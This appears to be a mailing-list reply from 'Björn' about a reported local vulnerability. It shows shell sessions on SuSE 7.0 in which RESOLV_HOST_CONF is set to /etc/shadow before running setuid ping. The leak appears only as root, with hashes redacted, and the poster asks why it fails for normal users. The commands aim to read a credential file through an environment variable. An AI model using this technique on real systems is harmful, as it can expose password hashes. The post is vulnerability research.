
Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerabi



I tried the exploit on a SuSE 7.0 host.
If root starts ping/traceroute..., the /etc/shadow file is shown;
if a normal user exports RESOLV_HOST_CONF, nothing abnormal
happens:

bj@spock:~ > ls -l /bin/ping
-rwsr-xr-x   1 root     root          23k Okt  4 12:37 /bin/ping
bj@spock:~ > ldd /bin/ping
        libc.so.6 => /lib/libc.so.6 (0x40021000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

bj@spock:~ > export RESOLV_HOST_CONF='/etc/shadow'
bj@spock:~ > ping localhost
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.189 ms
<-snip->
bj@spock:~ >


spock:~ # export RESOLV_HOST_CONF='/etc/shadow'
spock:~ # ping localhost
/etc/shadow: line 1: bad command `root:blabla:9473:0:10000::::'
<-snip->
/etc/shadow: line 47: bad command `bj:blabla:11194:0:99999:7:0::'
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.191 ms 
<-snip->
spock:~ #

Any idea why? Does the variable not apply to normal users?

Björn


